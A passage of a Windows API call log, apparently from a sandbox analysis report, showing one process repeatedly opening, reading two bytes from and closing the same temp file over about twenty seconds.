GetLastError () returned 0x0 [0070.918] ReadFile (in: hFile=0x458, lpBuffer=0x33397f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x33397f0*, lpNumberOfBytesRead=0xf2ef28*=0x0, lpOverlapped=0x0) returned 1 [0070.918] GetLastError () returned 0x0 [0070.918] CloseHandle (hObject=0x458) returned 1 [0070.918] GetLastError () returned 0x0 [0071.933] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", nBufferLength=0x105, lpBuffer=0xf2e9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", lpFilePart=0x0) returned 0x34 [0071.933] GetLastError () returned 0x0 [0071.933] SetErrorMode (uMode=0x1) returned 0x0 [0071.933] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\tmp3b59.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x458 [0071.933] GetLastError () returned 0x0 [0071.933] GetFileType (hFile=0x458) returned 0x1 [0071.933] SetErrorMode (uMode=0x0) returned 0x1 [0071.933] GetFileType (hFile=0x458) returned 0x1 [0071.934] ReadFile (in: hFile=0x458, lpBuffer=0x333bb50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x333bb50*, lpNumberOfBytesRead=0xf2ef28*=0x2, lpOverlapped=0x0) returned 1 [0071.934] GetLastError () returned 0x0 [0071.934] ReadFile (in: hFile=0x458, lpBuffer=0x333bb50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x333bb50*, lpNumberOfBytesRead=0xf2ef28*=0x0, lpOverlapped=0x0) returned 1 [0071.934] GetLastError () returned 0x0 [0071.934] CloseHandle (hObject=0x458) returned 1 [0071.934] GetLastError () returned 0x0 [0073.927] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", nBufferLength=0x105, lpBuffer=0xf2e9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", lpFilePart=0x0) returned 0x34 [0073.927] GetLastError () returned 0x0 [0073.927] SetErrorMode (uMode=0x1) returned 0x0 [0073.927] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\tmp3b59.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x458 [0073.927] GetLastError () returned 0x0 [0073.927] GetFileType (hFile=0x458) returned 0x1 [0073.927] SetErrorMode (uMode=0x0) returned 0x1 [0073.927] GetFileType (hFile=0x458) returned 0x1 [0073.928] ReadFile (in: hFile=0x458, lpBuffer=0x333deb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x333deb0*, lpNumberOfBytesRead=0xf2ef28*=0x2, lpOverlapped=0x0) returned 1 [0073.928] GetLastError () returned 0x0 [0073.928] ReadFile (in: hFile=0x458, lpBuffer=0x333deb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x333deb0*, lpNumberOfBytesRead=0xf2ef28*=0x0, lpOverlapped=0x0) returned 1 [0073.928] GetLastError () returned 0x0 [0073.928] CloseHandle (hObject=0x458) returned 1 [0073.928] GetLastError () returned 0x0 [0075.283] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", nBufferLength=0x105, lpBuffer=0xf2e9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", lpFilePart=0x0) returned 0x34 [0075.283] GetLastError () returned 0x0 [0075.283] SetErrorMode (uMode=0x1) returned 0x0 [0075.283] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\tmp3b59.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x458 [0075.284] GetLastError () returned 0x0 [0075.284] GetFileType (hFile=0x458) returned 0x1 [0075.284] SetErrorMode (uMode=0x0) returned 0x1 [0075.284] GetFileType (hFile=0x458) returned 0x1 [0075.284] ReadFile (in: hFile=0x458, lpBuffer=0x3340210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x3340210*, lpNumberOfBytesRead=0xf2ef28*=0x2, lpOverlapped=0x0) returned 1 [0075.284] GetLastError () returned 0x0 [0075.284] ReadFile (in: hFile=0x458, lpBuffer=0x3340210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x3340210*, lpNumberOfBytesRead=0xf2ef28*=0x0, lpOverlapped=0x0) returned 1 [0075.284] GetLastError () returned 0x0 [0075.284] CloseHandle (hObject=0x458) returned 1 [0075.285] GetLastError () returned 0x0 [0076.296] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", nBufferLength=0x105, lpBuffer=0xf2e9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", lpFilePart=0x0) returned 0x34 [0076.296] GetLastError () returned 0x0 [0076.296] SetErrorMode (uMode=0x1) returned 0x0 [0076.296] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\tmp3b59.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x458 [0076.297] GetLastError () returned 0x0 [0076.297] GetFileType (hFile=0x458) returned 0x1 [0076.297] SetErrorMode (uMode=0x0) returned 0x1 [0076.297] GetFileType (hFile=0x458) returned 0x1 [0076.297] ReadFile (in: hFile=0x458, lpBuffer=0x3342570, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x3342570*, lpNumberOfBytesRead=0xf2ef28*=0x2, lpOverlapped=0x0) returned 1 [0076.298] GetLastError () returned 0x0 [0076.298] ReadFile (in: hFile=0x458, lpBuffer=0x3342570, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x3342570*, lpNumberOfBytesRead=0xf2ef28*=0x0, lpOverlapped=0x0) returned 1 [0076.298] GetLastError () returned 0x0 [0076.298] CloseHandle (hObject=0x458) returned 1 [0076.298] GetLastError () returned 0x0 [0077.674] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", nBufferLength=0x105, lpBuffer=0xf2e9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", lpFilePart=0x0) returned 0x34 [0077.674] GetLastError () returned 0x0 [0077.674] SetErrorMode (uMode=0x1) returned 0x0 [0077.674] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\tmp3b59.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x458 [0077.674] GetLastError () returned 0x0 [0077.674] GetFileType (hFile=0x458) returned 0x1 [0077.674] SetErrorMode (uMode=0x0) returned 0x1 [0077.675] GetFileType (hFile=0x458) returned 0x1 [0077.675] ReadFile (in: hFile=0x458, lpBuffer=0x33448d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x33448d0*, lpNumberOfBytesRead=0xf2ef28*=0x2, lpOverlapped=0x0) returned 1 [0077.675] GetLastError () returned 0x0 [0077.675] ReadFile (in: hFile=0x458, lpBuffer=0x33448d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x33448d0*, lpNumberOfBytesRead=0xf2ef28*=0x0, lpOverlapped=0x0) returned 1 [0077.675] GetLastError () returned 0x0 [0077.675] CloseHandle (hObject=0x458) returned 1 [0077.675] GetLastError () returned 0x0 [0078.977] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", nBufferLength=0x105, lpBuffer=0xf2e9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", lpFilePart=0x0) returned 0x34 [0078.977] GetLastError () returned 0x0 [0078.977] SetErrorMode (uMode=0x1) returned 0x0 [0078.977] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\tmp3b59.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x458 [0078.977] GetLastError () returned 0x0 [0078.977] GetFileType (hFile=0x458) returned 0x1 [0078.977] SetErrorMode (uMode=0x0) returned 0x1 [0078.977] GetFileType (hFile=0x458) returned 0x1 [0078.978] ReadFile (in: hFile=0x458, lpBuffer=0x3346c30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x3346c30*, lpNumberOfBytesRead=0xf2ef28*=0x2, lpOverlapped=0x0) returned 1 [0078.978] GetLastError () returned 0x0 [0078.978] ReadFile (in: hFile=0x458, lpBuffer=0x3346c30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x3346c30*, lpNumberOfBytesRead=0xf2ef28*=0x0, lpOverlapped=0x0) returned 1 [0078.978] GetLastError () returned 0x0 [0078.978] CloseHandle (hObject=0x458) returned 1 [0078.978] GetLastError () returned 0x0 [0080.270] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", nBufferLength=0x105, lpBuffer=0xf2e9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", lpFilePart=0x0) returned 0x34 [0080.270] GetLastError () returned 0x0 [0080.270] SetErrorMode (uMode=0x1) returned 0x0 [0080.271] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\tmp3b59.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x458 [0080.271] GetLastError () returned 0x0 [0080.271] GetFileType (hFile=0x458) returned 0x1 [0080.271] SetErrorMode (uMode=0x0) returned 0x1 [0080.271] GetFileType (hFile=0x458) returned 0x1 [0080.271] ReadFile (in: hFile=0x458, lpBuffer=0x3348f90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x3348f90*, lpNumberOfBytesRead=0xf2ef28*=0x2, lpOverlapped=0x0) returned 1 [0080.271] GetLastError () returned 0x0 [0080.271] ReadFile (in: hFile=0x458, lpBuffer=0x3348f90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x3348f90*, lpNumberOfBytesRead=0xf2ef28*=0x0, lpOverlapped=0x0) returned 1 [0080.271] GetLastError () returned 0x0 [0080.272] CloseHandle (hObject=0x458) returned 1 [0080.272] GetLastError () returned 0x0 [0081.277] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", nBufferLength=0x105, lpBuffer=0xf2e9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", lpFilePart=0x0) returned 0x34 [0081.277] GetLastError () returned 0x0 [0081.277] SetErrorMode (uMode=0x1) returned 0x0 [0081.277] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\tmp3b59.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x458 [0081.277] GetLastError () returned 0x0 [0081.277] GetFileType (hFile=0x458) returned 0x1 [0081.277] SetErrorMode (uMode=0x0) returned 0x1 [0081.277] GetFileType (hFile=0x458) returned 0x1 [0081.277] ReadFile (in: hFile=0x458, lpBuffer=0x334b2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x334b2f0*, lpNumberOfBytesRead=0xf2ef28*=0x2, lpOverlapped=0x0) returned 1 [0081.278] GetLastError () returned 0x0 [0081.278] ReadFile (in: hFile=0x458, lpBuffer=0x334b2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x334b2f0*, lpNumberOfBytesRead=0xf2ef28*=0x0, lpOverlapped=0x0) returned 1 [0081.278] GetLastError () returned 0x0 [0081.278] CloseHandle (hObject=0x458) returned 1 [0081.278] GetLastError () returned 0x0 [0082.292] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", nBufferLength=0x105, lpBuffer=0xf2e9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", lpFilePart=0x0) returned 0x34 [0082.292] GetLastError () returned 0x0 [0082.292] SetErrorMode (uMode=0x1) returned 0x0 [0082.292] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\tmp3b59.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x458 [0082.292] GetLastError () returned 0x0 [0082.292] GetFileType (hFile=0x458) returned 0x1 [0082.293] SetErrorMode (uMode=0x0) returned 0x1 [0082.293] GetFileType (hFile=0x458) returned 0x1 [0082.293] ReadFile (in: hFile=0x458, lpBuffer=0x334d650, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x334d650*, lpNumberOfBytesRead=0xf2ef28*=0x2, lpOverlapped=0x0) returned 1 [0082.293] GetLastError () returned 0x0 [0082.293] ReadFile (in: hFile=0x458, lpBuffer=0x334d650, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x334d650*, lpNumberOfBytesRead=0xf2ef28*=0x0, lpOverlapped=0x0) returned 1 [0082.293] GetLastError () returned 0x0 [0082.293] CloseHandle (hObject=0x458) returned 1 [0082.293] GetLastError () returned 0x0 [0084.498] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", nBufferLength=0x105, lpBuffer=0xf2e9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", lpFilePart=0x0) returned 0x34 [0084.498] GetLastError () returned 0x0 [0084.498] SetErrorMode (uMode=0x1) returned 0x0 [0084.498] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\tmp3b59.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x458 [0084.498] GetLastError () returned 0x0 [0084.498] GetFileType (hFile=0x458) returned 0x1 [0084.498] SetErrorMode (uMode=0x0) returned 0x1 [0084.498] GetFileType (hFile=0x458) returned 0x1 [0084.498] ReadFile (in: hFile=0x458, lpBuffer=0x334f9b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x334f9b0*, lpNumberOfBytesRead=0xf2ef28*=0x2, lpOverlapped=0x0) returned 1 [0084.498] GetLastError () returned 0x0 [0084.498] ReadFile (in: hFile=0x458, lpBuffer=0x334f9b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x334f9b0*, lpNumberOfBytesRead=0xf2ef28*=0x0, lpOverlapped=0x0) returned 1 [0084.498] GetLastError () returned 0x0 [0084.498] CloseHandle (hObject=0x458) returned 1 [0084.499] GetLastError () returned 0x0 [0085.651] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", nBufferLength=0x105, lpBuffer=0xf2e9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", lpFilePart=0x0) returned 0x34 [0085.651] GetLastError () returned 0x0 [0085.651] SetErrorMode (uMode=0x1) returned 0x0 [0085.651] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\tmp3b59.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x458 [0085.651] GetLastError () returned 0x0 [0085.651] GetFileType (hFile=0x458) returned 0x1 [0085.651] SetErrorMode (uMode=0x0) returned 0x1 [0085.651] GetFileType (hFile=0x458) returned 0x1 [0085.652] ReadFile (in: hFile=0x458, lpBuffer=0x3351d10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x3351d10*, lpNumberOfBytesRead=0xf2ef28*=0x2, lpOverlapped=0x0) returned 1 [0085.652] GetLastError () returned 0x0 [0085.652] ReadFile (in: hFile=0x458, lpBuffer=0x3351d10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x3351d10*, lpNumberOfBytesRead=0xf2ef28*=0x0, lpOverlapped=0x0) returned 1 [0085.652] GetLastError () returned 0x0 [0085.652] CloseHandle (hObject=0x458) returned 1 [0085.652] GetLastError () returned 0x0 [0086.841] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", nBufferLength=0x105, lpBuffer=0xf2e9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", lpFilePart=0x0) returned 0x34 [0086.841] GetLastError () returned 0x0 [0086.841] SetErrorMode (uMode=0x1) returned 0x0 [0086.841] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\tmp3b59.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x458 [0086.841] GetLastError () returned 0x0 [0086.841] GetFileType (hFile=0x458) returned 0x1 [0086.841] SetErrorMode (uMode=0x0) returned 0x1 [0086.841] GetFileType (hFile=0x458) returned 0x1 [0086.841] ReadFile (in: hFile=0x458, lpBuffer=0x3354070, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x3354070*, lpNumberOfBytesRead=0xf2ef28*=0x2, lpOverlapped=0x0) returned 1 [0086.842] GetLastError () returned 0x0 [0086.842] ReadFile (in: hFile=0x458, lpBuffer=0x3354070, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x3354070*, lpNumberOfBytesRead=0xf2ef28*=0x0, lpOverlapped=0x0) returned 1 [0086.842] GetLastError () returned 0x0 [0086.842] CloseHandle (hObject=0x458) returned 1 [0086.842] GetLastError () returned 0x0 [0087.844] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", nBufferLength=0x105, lpBuffer=0xf2e9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", lpFilePart=0x0) returned 0x34 [0087.844] GetLastError () returned 0x0 [0087.844] SetErrorMode (uMode=0x1) returned 0x0 [0087.844] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\tmp3b59.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x458 [0087.844] GetLastError () returned 0x0 [0087.844] GetFileType (hFile=0x458) returned 0x1 [0087.844] SetErrorMode (uMode=0x0) returned 0x1 [0087.844] GetFileType (hFile=0x458) returned 0x1 [0087.845] ReadFile (in: hFile=0x458, lpBuffer=0x33563d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x33563d0*, lpNumberOfBytesRead=0xf2ef28*=0x2, lpOverlapped=0x0) returned 1 [0087.845] GetLastError () returned 0x0 [0087.845] ReadFile (in: hFile=0x458, lpBuffer=0x33563d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x33563d0*, lpNumberOfBytesRead=0xf2ef28*=0x0, lpOverlapped=0x0) returned 1 [0087.845] GetLastError () returned 0x0 [0087.845] CloseHandle (hObject=0x458) returned 1 [0087.845] GetLastError () returned 0x0 [0088.972] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", nBufferLength=0x105, lpBuffer=0xf2e9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", lpFilePart=0x0) returned 0x34 [0088.972] GetLastError () returned 0x0 [0088.972] SetErrorMode (uMode=0x1) returned 0x0 [0088.972] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\tmp3b59.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x458 [0088.973] GetLastError () returned 0x0 [0088.973] GetFileType (hFile=0x458) returned 0x1 [0088.973] SetErrorMode (uMode=0x0) returned 0x1 [0088.973] GetFileType (hFile=0x458) returned 0x1 [0088.973] ReadFile (in: hFile=0x458, lpBuffer=0x3358730, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x3358730*, lpNumberOfBytesRead=0xf2ef28*=0x2, lpOverlapped=0x0) returned 1 [0088.973] GetLastError () returned 0x0 [0088.973] ReadFile (in: hFile=0x458, lpBuffer=0x3358730, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x3358730*, lpNumberOfBytesRead=0xf2ef28*=0x0, lpOverlapped=0x0) returned 1 [0088.973] GetLastError () returned 0x0 [0088.973] CloseHandle (hObject=0x458) returned 1 [0088.973] GetLastError () returned 0x0 [0089.988] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", nBufferLength=0x105, lpBuffer=0xf2e9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", lpFilePart=0x0) returned 0x34 [0089.988] GetLastError () returned 0x0 [0089.988] SetErrorMode (uMode=0x1) returned 0x0 [0089.988] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\tmp3b59.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300 [0089.988] GetLastError () returned 0x0 [0089.988] GetFileType (hFile=0x300) returned 0x1 [0089.988] SetErrorMode (uMode=0x0) returned 0x1 [0089.988] GetFileType (hFile=0x300) returned 0x1 [0089.988] ReadFile (in: hFile=0x300, lpBuffer=0x335aa90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x335aa90*, lpNumberOfBytesRead=0xf2ef28*=0x2, lpOverlapped=0x0) returned 1 [0089.989] GetLastError () returned 0x0 [0089.989] ReadFile (in: hFile=0x300, lpBuffer=0x335aa90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x335aa90*, lpNumberOfBytesRead=0xf2ef28*=0x0, lpOverlapped=0x0) returned 1 [0089.989] GetLastError () returned 0x0 [0089.989] CloseHandle (hObject=0x300) returned 1 [0089.989] GetLastError () returned 0x0 [0091.433] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", nBufferLength=0x105, lpBuffer=0xf2e9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", lpFilePart=0x0) returned 0x34 [0091.433] GetLastError () returned 0x0 [0091.433] SetErrorMode (uMode=0x1) returned 0x0 [0091.433] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\tmp3b59.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300 [0091.433] GetLastError () returned 0x0 [0091.433] GetFileType (hFile=0x300) returned 0x1 [0091.434] SetErrorMode (uMode=0x0) returned 0x1 [0091.434] GetFileType (hFile=0x300) returned 0x1 [0091.434] ReadFile (in: hFile=0x300, lpBuffer=0x335cdf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x335cdf0*, lpNumberOfBytesRead=0xf2ef28*=0x2, lpOverlapped=0x0) returned 1 [0091.434] GetLastError () returned 0x0 [0091.434] ReadFile (in: hFile=0x300, lpBuffer=0x335cdf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x335cdf0*, lpNumberOfBytesRead=0xf2ef28*=0x0, lpOverlapped=0x0) returned 1 [0091.434] GetLastError () returned 0x0 [0091.434] 